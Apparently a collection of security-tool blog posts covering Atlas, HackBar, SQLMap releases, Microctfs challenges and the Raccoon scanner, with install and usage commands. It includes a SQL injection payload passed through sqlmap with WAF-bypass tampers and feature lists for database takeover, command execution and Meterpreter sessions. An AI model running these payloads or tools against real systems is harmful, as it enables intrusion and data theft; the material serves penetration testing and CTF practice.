<a href="https://2.bp.blogspot.com/-HYQCb0cTXXg/W7ktTzXrjGI/AAAAAAAAMuk/5I8n9PSHlO4ukSpp1bEF98bycnN6lZQaQCLcBGAs/s1600/Atlas_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="123" data-original-width="1182" height="66" src="https://2.bp.blogspot.com/-HYQCb0cTXXg/W7ktTzXrjGI/AAAAAAAAMuk/5I8n9PSHlO4ukSpp1bEF98bycnN6lZQaQCLcBGAs/s640/Atlas_3.png" width="640" /></a></div>
<br />
<code>Price_ASC') AND 8716=4837 AND ('yajr'='yajr</code> is blocked by the WAF/IDS/IPS, so the same payload is now passed to Atlas:<br />
<pre><code>$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Qlfby5I5dd4/W7ktXtqYo1I/AAAAAAAAMuo/7Qxc-qVG77E12N7Q8GaahebgFyFbdyYywCLcBGAs/s1600/Atlas_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="185" data-original-width="1464" height="80" src="https://4.bp.blogspot.com/-Qlfby5I5dd4/W7ktXtqYo1I/AAAAAAAAMuo/7Qxc-qVG77E12N7Q8GaahebgFyFbdyYywCLcBGAs/s640/Atlas_4.png" width="640" /></a></div>
<br />
With the tampers Atlas suggested, sqlmap is run again:<br />
<pre><code>$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/m4ll0k/Atlas" rel="nofollow" target="_blank">Download Atlas</a></span></b></div>
HackBar - HackBar Plugin For Burpsuite (published 2018-09-22)<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-kM_rGQ-AZdI/W6XTCYe7jgI/AAAAAAAAMjE/WV0ozGAOnDcEhBYaR1jExi5teCfMdpfYgCLcBGAs/s1600/HackBar_4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="665" data-original-width="882" height="482" src="https://3.bp.blogspot.com/-kM_rGQ-AZdI/W6XTCYe7jgI/AAAAAAAAMjE/WV0ozGAOnDcEhBYaR1jExi5teCfMdpfYgCLcBGAs/s640/HackBar_4.gif" width="640" /></a></div>
<br />
HackBar - HackBar Plugin For Burpsuite V1.0.<br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Burpsuite</li>
<li>Java</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>How to Install</b></span><br />
Download the JAR from <a href="https://github.com/d3vilbug/HackBar/releases/tag/1.0" rel="nofollow" target="_blank">https://github.com/d3vilbug/HackBar/releases/tag/1.0</a> and add it to Burp Suite as an extension.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-H7Dgxjxe_dw/W6XTPAF57QI/AAAAAAAAMjI/A0wF23n-WikC4Zb-oC0USZjQ_wLAplU1QCLcBGAs/s1600/HackBar_5.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="665" data-original-width="1321" height="322" src="https://2.bp.blogspot.com/-H7Dgxjxe_dw/W6XTPAF57QI/AAAAAAAAMjI/A0wF23n-WikC4Zb-oC0USZjQ_wLAplU1QCLcBGAs/s640/HackBar_5.gif" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Tested on</b></span><br />
<ul>
<li>Burpsuite 1.7.36</li>
<li>Windows 10</li>
<li>xubuntu 18.04</li>
</ul>
<br />
<span style="font-size: large;"><b>Upcoming Features/Modules</b></span><br />
<ul>
<li>Ctrl + H (shortcut)</li>
<li>WAF bypass (SQLi)</li>
<li>Decoder/Encoder</li>
<li>Simulate Attack (Automatically test complete cheat sheet with one click)</li>
</ul>
<br />
<span style="font-size: large;"><b>Greets</b></span><br />
<ul>
<li>An0n 3xPloiTeR <a href="https://github.com/Anon-Exploiter/" rel="nofollow" target="_blank">https://github.com/Anon-Exploiter/</a> for <a href="http://www.kitploit.com/search/label/SQLi">SQLi</a> && <a href="http://www.kitploit.com/search/label/XSS">XSS</a> payloads</li>
<li>PayloadsAllTheThings <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" rel="nofollow" target="_blank">https://github.com/swisskyrepo/PayloadsAllTheThings/</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/d3vilbug/HackBar" rel="nofollow" target="_blank">Download HackBar</a></span></b></div>
SQLMap v1.2.9 - Automatic SQL Injection And Database Takeover Tool (published 2018-09-07)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ix3AwQ23UAg/W5IGbus4orI/AAAAAAAAMbM/0XMrDbZEpPs7gw3jPzYQ7zG8ZTpw5fPFQCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="534" data-original-width="677" height="504" src="https://1.bp.blogspot.com/-ix3AwQ23UAg/W5IGbus4orI/AAAAAAAAMbM/0XMrDbZEpPs7gw3jPzYQ7zG8ZTpw5fPFQCLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support for <strong>connecting directly to the database</strong> without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support for enumerating <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support for <strong>dumping database tables</strong> entirely, a range of entries, or specific columns, as the user chooses. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support for <strong>searching for specific database names, specific tables across all databases, or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials, where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support for <strong>downloading and uploading any file</strong> from or to the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support for <strong>executing arbitrary commands and retrieving their standard output</strong> on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support for <strong>establishing an out-of-band stateful TCP connection between the attacker machine and the operating system underlying the database server</strong>. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as the user chooses.</li>
<li style="text-align: justify;">Support for <strong>privilege escalation of the database process's user</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or the latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.9</a></span></b></div>
<span style="font-size: large;"><b>SQLMap v1.2.8 - Automatic SQL Injection And Database Takeover Tool</b></span> (published 2018-08-28)<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-czqlRY-vLd8/W4TS7P5D1qI/AAAAAAAAMTA/V5yutt2PbsIdmX9NE3MYlO2P_zqKUvagQCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="643" data-original-width="658" height="624" src="https://4.bp.blogspot.com/-czqlRY-vLd8/W4TS7P5D1qI/AAAAAAAAMTA/V5yutt2PbsIdmX9NE3MYlO2P_zqKUvagQCLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches spanning database fingerprinting, data fetching from the database, access to the underlying file system and execution of commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script src="https://asciinema.org/a/46601.js" id="asciicast-46601" async></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.8</a></span></b></div>
<span style="font-size: large;"><b>Microctfs - Small CTF Challenges Running On Docker</b></span> (published 2018-08-26)<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-GfoQJOicmzo/W3-Jy9g9mqI/AAAAAAAAMPk/uHFqOiIhUgUC8WnG_jhQwsz86t-A0e49QCLcBGAs/s1600/docker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="370" data-original-width="485" src="https://4.bp.blogspot.com/-GfoQJOicmzo/W3-Jy9g9mqI/AAAAAAAAMPk/uHFqOiIhUgUC8WnG_jhQwsz86t-A0e49QCLcBGAs/s1600/docker.png" /></a></div>
<br />
Small <a href="http://www.kitploit.com/search/label/CTF">CTF</a> challenges running on Docker<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>logviewer</b></span><br />
<br />
<b>Build and Start logviewer challenge exposed on port 8000</b><br />
<pre><code>cd logviewer
docker build -t logviewer .
docker run -d -p 8000:80 --name log_challenge logviewer</code></pre>
<br />
<b>Restart logviewer challenge</b><br />
<pre><code>docker rm -f log_challenge && docker run -d -p 8000:80 --name log_challenge logviewer</code></pre>
<br />
<b>Stop logviewer challenge</b><br />
<pre><code>docker rm -f log_challenge</code></pre>
<br />
<span style="font-size: large;"><b>sqli</b></span><br />
<br />
<b>Build and Start <a href="http://www.kitploit.com/search/label/SQLi">sqli</a> challenge exposed on port 8883</b><br />
<pre><code>cd sqli
docker build -t sqli .
docker run -d -p 8883:80 --name sqli_chal sqli</code></pre>
<br />
<b>Restart sqli challenge</b><br />
<pre><code>docker rm -f sqli_chal && docker run -d -p 8883:80 --name sqli_chal sqli</code></pre>
<br />
<b>Stop sqli challenge</b><br />
<pre><code>docker rm -f sqli_chal</code></pre>
<br />
<span style="font-size: large;"><b>tcmanager</b></span><br />
<br />
<b>Build and Start tcmanager challenge exposed on port 8080</b><br />
<pre><code>cd tcmanager
docker build -t tcmanager .
docker run -d -p 8080:8080 --name tc_chal tcmanager</code></pre>
<br />
<b>Restart tcmanager challenge</b><br />
<pre><code>docker rm -f tc_chal && docker run -d -p 8080:8080 --name tc_chal tcmanager</code></pre>
<br />
<b>Stop tcmanager challenge</b><br />
<pre><code>docker rm -f tc_chal</code></pre>
<br />
<span style="font-size: large;"><b>geddy</b></span><br />
<br />
<b>Build and Start geddy challenge exposed on port 40000</b><br />
<pre><code>cd geddy
docker build -t geddy .
docker run -d -p 40000:4000 --name geddy_chal geddy</code></pre>
<br />
<b>Restart geddy challenge</b><br />
<pre><code>docker rm -f geddy_chal && docker run -d -p 40000:4000 --name geddy_chal geddy</code></pre>
<br />
<b>Stop geddy challenge</b><br />
<pre><code>docker rm -f geddy_chal</code></pre>
<br />
<span style="font-size: large;"><b>printf</b></span><br />
<br />
<b>Build and Start printf challenge exposed on port 1337</b><br />
<pre><code>cd printf
docker build -t printf .
docker run -d -p 1337:1337 --name printfchal printf</code></pre>
<br />
<b>Restart printf challenge</b><br />
<pre><code>docker rm -f printfchal && docker run -d -p 1337:1337 --name printfchal printf</code></pre>
<br />
<b>Stop printf challenge</b><br />
<pre><code>docker rm -f printfchal</code></pre>
<br />
<span style="font-size: large;"><b>xxe</b></span><br />
<br />
<b>Build and Start <a href="http://www.kitploit.com/search/label/XXE">xxe</a> challenge exposed on port 8080</b><br />
<pre><code>cd xxe
docker build -t xxe .
docker run -d -p 8080:8080 xxe mvn jetty:run</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/gabemarshall/microctfs" rel="nofollow" target="_blank">Download Microctfs</a></span></b></div>
<span style="font-size: large;"><b>Raccoon - A High Performance Offensive Security Tool For Reconnaissance And Vulnerability Scanning</b></span> (published 2018-08-04)<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-MNlKi5k8uSU/W2E_hECkFkI/AAAAAAAAMBA/9yfiX-UpBdUCvs5x09kTXyzS3QfvzxeUQCLcBGAs/s1600/Raccoon_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="696" data-original-width="566" src="https://4.bp.blogspot.com/-MNlKi5k8uSU/W2E_hECkFkI/AAAAAAAAMBA/9yfiX-UpBdUCvs5x09kTXyzS3QfvzxeUQCLcBGAs/s1600/Raccoon_6.png" /></a></div>
<br />
Offensive Security Tool for <a href="http://www.kitploit.com/search/label/Reconnaissance">Reconnaissance</a> and Information Gathering.<br />
<a name='more'></a><br />
<b>Features</b><br />
<ul class="contains-task-list">
<li class="task-list-item">DNS details</li>
<li class="task-list-item">DNS visual mapping using DNS dumpster</li>
<li class="task-list-item">WHOIS information</li>
<li class="task-list-item">TLS Data - supported ciphers, TLS versions, certificate details and SANs</li>
<li class="task-list-item">Port Scan</li>
<li class="task-list-item">Services and scripts scan</li>
<li class="task-list-item">URL fuzzing and dir/file detection</li>
<li class="task-list-item">Subdomain enumeration - uses Google dorking, DNS dumpster queries, SAN discovery and bruteforce</li>
<li class="task-list-item">Web application data retrieval:<br /> <ul>
<li>CMS detection</li>
<li>Web server info and X-Powered-By</li>
<li>robots.txt and sitemap extraction</li>
<li>Cookie inspection</li>
<li>Extracts all fuzzable URLs</li>
<li>Discovers HTML forms</li>
<li>Retrieves all Email addresses</li>
</ul>
</li>
<li class="task-list-item">Detects known WAFs</li>
<li class="task-list-item">Supports anonymous routing through Tor/Proxies</li>
<li class="task-list-item">Uses asyncio for improved performance</li>
<li class="task-list-item">Saves output to files - separates targets by folders and modules by files</li>
</ul>
<br />
<b>Roadmap and TODOs</b><br />
<ul class="contains-task-list">
<li class="task-list-item">Support multiple hosts (read from file)</li>
<li class="task-list-item">Rate limit evasion</li>
<li class="task-list-item">OWASP <a href="http://www.kitploit.com/search/label/vulnerabilities">vulnerabilities</a> scan (RFI, RCE, XSS, SQLi etc.)</li>
<li class="task-list-item">SearchSploit lookup on results</li>
<li class="task-list-item">IP ranges support</li>
<li class="task-list-item">CIDR notation support</li>
<li class="task-list-item">More output formats</li>
</ul>
<br />
<span style="font-size: large;"><b>About</b></span><br />
Raccoon is a tool made for reconnaissance and <a href="http://www.kitploit.com/search/label/Information%20Gathering">information gathering</a> with an emphasis on simplicity.<br />
It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data and detecting WAF presence, all the way to threaded dir busting and subdomain enumeration. Every scan writes its output to a corresponding file.<br />
As most of Raccoon's scans are independent and do not rely on each other's results, it utilizes Python's asyncio to run most scans asynchronously.<br />
Raccoon supports Tor/proxy for anonymous routing. It uses default wordlists (for URL fuzzing and subdomain discovery) from the amazing <a href="https://github.com/danielmiessler/SecLists" rel="nofollow" target="_blank">SecLists</a> repository but different lists can be passed as arguments.<br />
For more options - see "Usage".<br />
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
For the latest stable version:<br />
<pre><code>pip install raccoon-scanner</code></pre>
Or clone the GitHub repository for the latest features and changes:<br />
<pre><code>git clone https://github.com/evyatarmeged/Raccoon.git
cd Raccoon
python raccoon_src/main.py</code></pre>
<br />
<b>Prerequisites</b><br />
Raccoon uses <a href="https://github.com/nmap/nmap" rel="nofollow" target="_blank">Nmap</a> to scan ports as well as utilizes some other Nmap scripts and features. It is mandatory that you have it installed before running Raccoon.<br />
<a href="https://github.com/openssl/openssl" rel="nofollow" target="_blank">OpenSSL</a> is also used for TLS/SSL scans and should be installed as well.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>Usage: raccoon [OPTIONS]

Options:
  --version                      Show the version and exit.
  -t, --target TEXT              Target to scan [required]
  -d, --dns-records TEXT         Comma separated DNS records to query.
                                 Defaults to: A,MX,NS,CNAME,SOA,TXT
  --tor-routing                  Route HTTP traffic through Tor (uses port
                                 9050). Slows total runtime significantly
  --proxy-list TEXT              Path to proxy list file that would be used
                                 for routing HTTP traffic. A proxy from the
                                 list will be chosen at random for each
                                 request. Slows total runtime
  --proxy TEXT                   Proxy address to route HTTP traffic through.
                                 Slows total runtime
  -w, --wordlist TEXT            Path to wordlist that would be used for URL
                                 fuzzing
  -T, --threads INTEGER          Number of threads to use for URL
                                 Fuzzing/Subdomain enumeration. Default: 25
  --ignored-response-codes TEXT  Comma separated list of HTTP status code to
                                 ignore for fuzzing. Defaults to:
                                 302,400,401,402,403,404,503,504
  --subdomain-list TEXT          Path to subdomain list file that would be
                                 used for enumeration
  -S, --scripts                  Run Nmap scan with -sC flag
  -s, --services                 Run Nmap scan with -sV flag
  -f, --full-scan                Run Nmap scan with both -sV and -sC
  -p, --port TEXT                Use this port range for Nmap scan instead of
                                 the default
  --tls-port INTEGER             Use this port for TLS queries. Default: 443
  --skip-health-check            Do not test for target host availability
  -fr, --follow-redirects        Follow redirects when fuzzing. Default: True
  --no-url-fuzzing               Do not fuzz URLs
  --no-sub-enum                  Do not bruteforce subdomains
  -q, --quiet                    Do not output to stdout
  -o, --outdir TEXT              Directory destination for scan output
  --help                         Show this message and exit.</code></pre>
<br />
<span style="font-size: large;"><b>Screenshots</b></span><br />
<br />
<strong><a href="https://www.hackthebox.eu/" rel="nofollow" target="_blank">HTB</a> challenge example scan:</strong><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
